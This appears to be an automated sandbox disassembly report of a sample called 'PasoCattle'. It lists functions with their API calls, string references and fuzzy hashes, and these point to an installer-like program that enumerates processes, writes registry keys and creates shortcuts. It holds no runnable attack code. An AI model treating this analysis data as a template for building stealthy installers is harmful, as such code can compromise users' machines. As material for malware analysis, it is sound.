Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Process32FirstW, xrefs: 004065E9
EnumProcessModules, xrefs: 004064B6
Module32FirstW, xrefs: 004065FF
Kernel32.DLL, xrefs: 004065C7
CreateToolhelp32Snapshot, xrefs: 004065E1
GetModuleBaseNameW, xrefs: 004064C0
EnumProcesses, xrefs: 004064AE
Unknown, xrefs: 00406528
Module32NextW, xrefs: 0040660A
Process32NextW, xrefs: 004065F4
PSAPI.DLL, xrefs: 00406490

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
F, xrefs: 004042D3
N, xrefs: 00404298

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

[Rename], xrefs: 00406BF4, 00406C03
NUL, xrefs: 00406ACA
^F, xrefs: 00406ACF
%s=%s, xrefs: 00406B6F
plF, xrefs: 00406B54

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
